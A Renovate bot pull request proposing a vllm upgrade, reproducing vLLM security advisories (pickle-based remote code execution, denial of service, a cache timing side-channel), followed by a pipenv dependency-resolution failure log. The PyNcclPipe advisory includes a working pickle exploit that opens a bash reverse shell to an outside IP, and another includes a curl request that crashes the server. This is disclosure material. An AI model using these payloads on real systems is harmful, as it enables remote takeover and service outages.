Skip to content

Update dependency vllm to v0.22.0 [SECURITY] - autoclosed#45

Closed
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/pypi-vllm-vulnerability
Closed

Update dependency vllm to v0.22.0 [SECURITY] - autoclosed#45
renovate[bot] wants to merge 1 commit into
mainfrom
renovate/pypi-vllm-vulnerability

Conversation

@renovate

@renovate renovate Bot commented May 31, 2025

Copy link
Copy Markdown
Contributor

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
vllm ==v0.8.4==0.22.0 age adoption passing confidence
vllm ==v0.6.6==0.22.0 age adoption passing confidence
vllm ==v0.6.4==0.22.0 age adoption passing confidence
vllm ==0.11.0==0.22.0 age adoption passing confidence
vllm ==0.8.4==0.22.0 age adoption passing confidence
vllm ==0.6.6==0.22.0 age adoption passing confidence
vllm ==0.6.4==0.22.0 age adoption passing confidence

vLLM denial of service vulnerability

CVE-2024-8768 / GHSA-w2r7-9579-27hf

More information

Details

A flaw was found in the vLLM library. A completions API request with an empty prompt will crash the vLLM API server, resulting in a denial of service.

Severity

  • CVSS Score: 8.7 / 10 (High)
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vllm: Malicious model to RCE by torch.load in hf_model_weights_iterator

CVE-2025-24357 / GHSA-rh4j-5rhw-hr54

More information

Details

Description

The vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It use torch.load function and weights_only parameter is default value False. There is a security warning on https://pytorch.org/docs/stable/generated/torch.load.html, when torch.load load a malicious pickle data it will execute arbitrary code during unpickling.

Impact

This vulnerability can be exploited to execute arbitrary codes and OS commands in the victim machine who fetch the pretrained repo remotely.

Note that most models now use the safetensors format, which is not vulnerable to this issue.

References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM uses Python 3.12 built-in hash() which leads to predictable hash collisions in prefix cache

CVE-2025-25183 / GHSA-rm76-4mrf-v9r8

More information

Details

Summary

Maliciously constructed prompts can lead to hash collisions, resulting in prefix cache reuse, which can interfere with subsequent responses and cause unintended behavior.

Details

vLLM's prefix caching makes use of Python's built-in hash() function. As of Python 3.12, the behavior of hash(None) has changed to be a predictable constant value. This makes it more feasible that someone could try exploit hash collisions.

Impact

The impact of a collision would be using cache that was generated using different content. Given knowledge of prompts in use and predictable hashing behavior, someone could intentionally populate the cache using a prompt known to collide with another prompt in use.

Solution

We address this problem by initializing hashes in vllm with a value that is no longer constant and predictable. It will be different each time vllm runs. This restores behavior we got in Python versions prior to 3.12.

Using a hashing algorithm that is less prone to collision (like sha256, for example) would be the best way to avoid the possibility of a collision. However, it would have an impact to both performance and memory footprint. Hash collisions may still occur, though they are no longer straight forward to predict.

To give an idea of the likelihood of a collision, for randomly generated hash values (assuming the hash generation built into Python is uniformly distributed), with a cache capacity of 50,000 messages and an average prompt length of 300, a collision will occur on average once every 1 trillion requests.

References

Severity

  • CVSS Score: 2.6 / 10 (Low)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:N

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM denial of service via outlines unbounded cache on disk

CVE-2025-29770 / GHSA-mgrm-fgjv-mhv8

More information

Details

Impact

The outlines library is one of the backends used by vLLM to support structured output (a.k.a. guided decoding). Outlines provides an optional cache for its compiled grammars on the local filesystem. This cache has been on by default in vLLM. Outlines is also available by default through the OpenAI compatible API server.

The affected code in vLLM is vllm/model_executor/guided_decoding/outlines_logits_processors.py, which unconditionally uses the cache from outlines. vLLM should have this off by default and allow administrators to opt-in due to the potential for abuse.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service if the filesystem runs out of space.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose outlines on a per-request basis using the guided_decoding_backend key of the extra_body field of the request.

This issue applies to the V0 engine only. The V1 engine is not affected.

Patches

The fix is to disable this cache by default since it does not provide an option to limit its size. If you want to use this cache anyway, you may set the VLLM_V0_USE_OUTLINES_CACHE environment variable to 1.

Workarounds

There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.

References

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM Allows Remote Code Execution via Mooncake Integration

CVE-2025-29783 / GHSA-x3m8-f7g5-qhm7

More information

Details

Summary

When vLLM is configured to use Mooncake, unsafe deserialization exposed directly over ZMQ/TCP will allow attackers to execute remote code on distributed hosts.

Details
  1. Pickle deserialization vulnerabilities are well documented.
  2. The mooncake pipe is exposed over the network (by design to enable disaggregated prefilling across distributed environments) using ZMQ over TCP, greatly increasing exploitability. Further, the mooncake integration opens these sockets listening on all interfaces on the host, meaning it can not be configured to only use a private, trusted network.

Only sender_socket and receiver_ack are allowed to be accessed publicly, while the data actually decompressed by pickle.loads() comes from recv_bytes. Its interface is defined as self.receiver_socket.connect(f\"tcp://{d_host}:{d_rank_offset + 1}\"), where d_host is decode_host, a locally defined address 192.168.0.139,from mooncake.json (https://github.com/kvcache-ai/Mooncake/blob/main/doc/en/vllm-integration-v0.2.md?plain=1#L36).

  1. The root problem is recv_tensor() calls _recv_impl which passes the raw network bytes to pickle.loads(). Additionally, it does not appear that there are any controls (network, authentication, etc) to prevent arbitrary users from sending this payload to the affected service.
Impact

This is a remote code execution vulnerability impacting any deployments using Mooncake to distribute KV across distributed hosts.

Remediation

This issue is resolved by https://github.com/vllm-project/vllm/pull/14228

Severity

  • CVSS Score: 9.0 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM vulnerable to Denial of Service by abusing xgrammar cache

GHSA-hf3c-wxg2-49q9

More information

Details

Impact

This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3

The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.

Patches
Workarounds

There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.

References

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-24357 Malicious model remote code execution fix bypass with PyTorch < 2.6.0

GHSA-ggpf-24jw-3fcw

More information

Details

Description

GHSA-rh4j-5rhw-hr54 reported a vulnerability where loading a malicious model could result in code execution on the vllm host. The fix applied to specify weights_only=True to calls to torch.load() did not solve the problem prior to PyTorch 2.6.0.

PyTorch has issued a new CVE about this problem: GHSA-53q9-r3pm-6pq6

This means that versions of vLLM using PyTorch before 2.6.0 are vulnerable to this problem.

Background Knowledge

When users install VLLM according to the official manual
image

But the version of PyTorch is specified in the requirements. txt file
image

So by default when the user install VLLM, it will install the PyTorch with version 2.5.1
image

In CVE-2025-24357, weights_only=True was used for patching, but we know this is not secure.
Because we found that using Weights_only=True in pyTorch before 2.5.1 was unsafe

Here, we use this interface to prove that it is not safe.
image

Fix

update PyTorch version to 2.6.0

Credit

This vulnerability was found By Ji'an Zhou and Li'shuo Song

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Data exposure via ZeroMQ on multi-node vLLM deployment

CVE-2025-30202 / GHSA-9f8f-2vmf-885j

More information

Details

Impact

In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.

Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.

By potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.

Detailed Analysis

The XPUB socket in question is created here:

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237

Data is published over this socket via MessageQueue.enqueue() which is called by MessageQueue.broadcast_object():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478

The MessageQueue.broadcast_object() method is called by the GroupCoordinator.broadcast_object() method in parallel_state.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366

The broadcast over ZeroMQ is only done if the GroupCoordinator was created with use_message_queue_broadcaster set to True:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219

The only case where GroupCoordinator is created with use_message_queue_broadcaster is the coordinator for the tensor parallelism group:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936

To determine what data is broadcasted to the tensor parallism group, we must continue tracing. GroupCoordinator.broadcast_object() is called by GroupCoordinator.broadcoast_tensor_dict():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489

which is called by broadcast_tensor_dict() in communication_op.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34

If we look at _get_driver_input_and_broadcast() in the V0 worker_base.py, we'll see how this tensor dict is formed:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352

but the data actually sent over ZeroMQ is the metadata_list portion that is split from this tensor_dict. The tensor parts are sent via torch.distributed and only metadata about those tensors is sent via ZeroMQ.

https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83

Patches
Workarounds

Prior to the fix, your options include:

  1. Do not expose the vLLM host to a network where any untrusted connections may reach the host.
  2. Ensure that only the other vLLM hosts are able to connect to the TCP port used for the XPUB socket. Note that port used is random.
References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


vLLM Vulnerable to Remote Code Execution via Mooncake Integration

CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5

More information

Details

Impacted Deployments

Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.

Description

vLLM integration with mooncake is vaulnerable to remote code execution due to using pickle based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.

This is a similar to GHSA - x3m8 - f7g5 - qhm7, the problem is in

https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179

Here recv_pyobj() Contains implicit pickle.loads(), which leads to potential RCE.

Severity

  • CVSS Score: 10.0 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Data exposure via ZeroMQ on multi-node vLLM deployment

CVE-2025-30202 / GHSA-9f8f-2vmf-885j

More information

Details

Impact

In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.

Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.

By potentially connecting to this socket many times and not reading data published to them, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.

Detailed Analysis

The XPUB socket in question is created here:

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237

Data is published over this socket via MessageQueue.enqueue() which is called by MessageQueue.broadcast_object():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478

The MessageQueue.broadcast_object() method is called by the GroupCoordinator.broadcast_object() method in parallel_state.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366

The broadcast over ZeroMQ is only done if the GroupCoordinator was created with use_message_queue_broadcaster set to True:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219

The only case where GroupCoordinator is created with use_message_queue_broadcaster is the coordinator for the tensor parallelism group:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936

To determine what data is broadcasted to the tensor parallism group, we must continue tracing. GroupCoordinator.broadcast_object() is called by GroupCoordinator.broadcoast_tensor_dict():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489

which is called by broadcast_tensor_dict() in communication_op.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34

If we look at _get_driver_input_and_broadcast() in the V0 worker_base.py, we'll see how this tensor dict is formed:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352

but the data actually sent over ZeroMQ is the metadata_list portion that is split from this tensor_dict. The tensor parts are sent via torch.distributed and only metadata about those tensors is sent via ZeroMQ.

https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83

Patches
Workarounds

Prior to the fix, your options include:

  1. Do not expose the vLLM host to a network where any untrusted connections may reach the host.
  2. Ensure that only the other vLLM hosts are able to connect to the TCP port used for the XPUB socket. Note that port used is random.
References

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM Vulnerable to Remote Code Execution via Mooncake Integration

CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5 / PYSEC-2025-42

More information

Details

Impacted Deployments

Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.

Description

vLLM integration with mooncake is vaulnerable to remote code execution due to using pickle based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.

This is a similar to GHSA - x3m8 - f7g5 - qhm7, the problem is in

https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179

Here recv_pyobj() Contains implicit pickle.loads(), which leads to potential RCE.

Severity

  • CVSS Score: 10.0 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM Allows Remote Code Execution via PyNcclPipe Communication Service

CVE-2025-47277 / GHSA-hjq4-87xh-g4fv

More information

Details

Impacted Environments

This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.

Summary

vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. The GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods on the CPU side.​

A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.

The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html

Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The IP address given was only used as a client-side address to use. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.

This issue was reported privately to PyTorch and they determined that this behavior was intentional.

Details

The PyNcclPipe implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads , creating an unsafe deserialization vulnerability that can lead to ​Remote Code Execution.

  1. Deploy a PyNcclPipe service configured to listen on port 18888 when launched:
from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe
from vllm.config import KVTransferConfig

config=KVTransferConfig(
    kv_ip="0.0.0.0",
    kv_port=18888,
    kv_rank=0,
    kv_parallel_size=1,
    kv_buffer_size=1024,
    kv_buffer_device="cpu"
)

p=PyNcclPipe(config=config,local_rank=0)
p.recv_tensor() # Receive data
  1. The attacker crafts malicious packets and sends them to the PyNcclPipe service:
from vllm.distributed.utils import StatelessProcessGroup

class Evil:
    def __reduce__(self):
        import os
        cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"'
        return (os.system,(cmd,))

client = StatelessProcessGroup.create(
    host='172.17.0.1',
    port=18888,
    rank=1,
    world_size=2,
)

client.send_obj(obj=Evil(),dst=0)

The call stack triggering ​RCE is as follows:

vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
	-> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
		-> vllm.distributed.utils.StatelessProcessGroup.recv_obj
			-> pickle.loads 

Getshell as follows:

image

Reporters

This issue was reported independently by three different parties:

  • @​kikayli (Zhuque Lab, Tencent)
  • @​omjeki
  • Russell Bryant (@​russellb)
Fix

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


phi4mm: Quadratic Time Complexity in Input Token Processing​ leads to denial of service

CVE-2025-46560 / GHSA-vc6m-hm49-g9qg

More information

Details

Summary

A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to ​​inefficient list concatenation operations​​, the algorithm exhibits ​​quadratic time complexity (O(n²))​​, allowing malicious actors to trigger resource exhaustion via specially crafted inputs.

Details

​​Affected Component​​: input_processor_for_phi4mm function.
https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197

The code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios.

PoC

Test data demonstrates exponential time growth:

test_cases = [100, 200, 400, 800, 1600, 3200, 6400]
run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854]  # seconds

Doubling input size increases runtime by ~4x (consistent with O(n²)).

Impact

​​Denial-of-Service (DoS):​​ An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion.
Example: 10,000 placeholders → ~100 million operations.

Remediation Recommendations​

Precompute all placeholder positions and expansion lengths upfront.
Replace dynamic list concatenation with a single preallocated array.

##### Pseudocode for O(n) solution
new_input_ids = []
for token in input_ids:
    if token is placeholder:
        new_input_ids.extend([token] * precomputed_length)
    else:
        new_input_ids.append(token)

Severity

  • CVSS Score: 6.5 / 10 (Medium)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


CVE-2025-32444 / GHSA-hj4w-hm2g-p6w5 / PYSEC-2025-42

More information

Details

vLLM is a high-throughput and memory-efficient inference and serving engine for LLMs. Versions starting from 0.6.5 and prior to 0.8.5, having vLLM integration with mooncake, are vulnerable to remote code execution due to using pickle based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack. vLLM instances that do not make use of the mooncake integration are not vulnerable. This issue has been patched in version 0.8.5.

Severity

  • CVSS Score: 9.8 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

This data is provided by OSV and the PyPI Advisory Database (CC-BY 4.0).


Potential Timing Side-Channel Vulnerability in vLLM’s Chunk-Based Prefix Caching

CVE-2025-46570 / GHSA-4qjh-9fv9-r85r / PYSEC-2025-53

More information

Details

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.

Environment
  • GPU: NVIDIA A100 (40G)
  • CUDA: 11.8
  • PyTorch: 2.3.1
  • OS: Ubuntu 18.04
  • vLLM: v0.5.1
    Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.
Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.
roc_curves_combined_block_2

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

  • With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
  • When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.
Fixes

Severity

  • CVSS Score: 2.6 / 10 (Low)
  • Vector String: CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


vLLM DOS: Remotely kill vllm over http with invalid JSON schema

CVE-2025-48942 / GHSA-6qc9-v4r8-22xg / PYSEC-2025-54

More information

Details

Summary

Hitting the /v1/completions API with a invalid json_schema as a Guided Param will kill the vllm server

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke a Uncaught exceptions from xgrammer in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vllm with invalid json_scema e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vllm crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 

> ✂ **Note**
> 
> PR body was truncated to here.

@renovate

renovate Bot commented May 31, 2025

Copy link
Copy Markdown
Contributor Author

⚠️ Artifact update problem

Renovate failed to update artifacts related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: model-servers/vllm/0.11.0/Pipfile.lock
Command failed: pipenv lock
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-3x79djt8-requirements/pipenv-3ry_9qr3-constraints.txt 
(line 25) and transformers~=4.55.2 because these package versions have 
conflicting dependencies.
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:
The conflict is caused by:
    The user requested transformers~=4.55.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0
Additionally, some packages in these conflicts have no matching distributions 
available for your environment:
    transformers
To fix this you could try to:
1. loosen the range of package versions you've specified
2. remove package versions to allow pip to attempt to solve the dependency 
conflict
Your dependencies could not be resolved. You likely have a mismatch in your 
sub-dependencies.
You can use $ pipenv run pip install <requirement_name> to bypass this 
mechanism, then run $ pipenv graph to inspect the versions actually installed in
the virtualenv.
Hint: try $ pipenv lock --pre if it is a pre-release dependency.
Hint: try $ pipenv lock --verbose to see the full dependency resolution output.
ERROR: ResolutionImpossible: for help visit 
https://pip.pypa.io/en/latest/topics/dependency-resolution/#dealing-with-depende
ncy-conflicts
The conflict is caused by:
    The user requested transformers~=4.55.2
    vllm 0.20.0 depends on transformers!=5.0.*, !=5.1.*, !=5.2.*, !=5.3.*, 
!=5.4.*, !=5.5.0 and >=4.56.0

Hint: Re-run with --verbose to see the full dependency resolution output and 
identify which packages are in conflict.
Traceback (most recent call last):
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/routines/lock.py", line 94, in do_lock
    venv_resolve_deps(
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1449, in venv_resolve_deps
    c = resolve(cmd, st, project=project)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File 
"/opt/containerbase/tools/pipenv/2026.6.1/3.11.15/lib/python3.11/site-packages/p
ipenv/utils/resolver.py", line 1233, in resolve
    raise ResolutionFailure("Failed to lock Pipfile.lock!")
pipenv.exceptions.ResolutionFailure: ERROR: Failed to lock Pipfile.lock!


File name: model-servers/vllm/0.6.4/Pipfile.lock
Command failed: pipenv lock
Locking  dependencies...
CRITICAL:pipenv.patched.pip._internal.resolution.resolvelib.factory:Cannot 
install -r /tmp/pipenv-f8d1xsvp-requirements/pipenv-2mwihes6-constraints.txt 
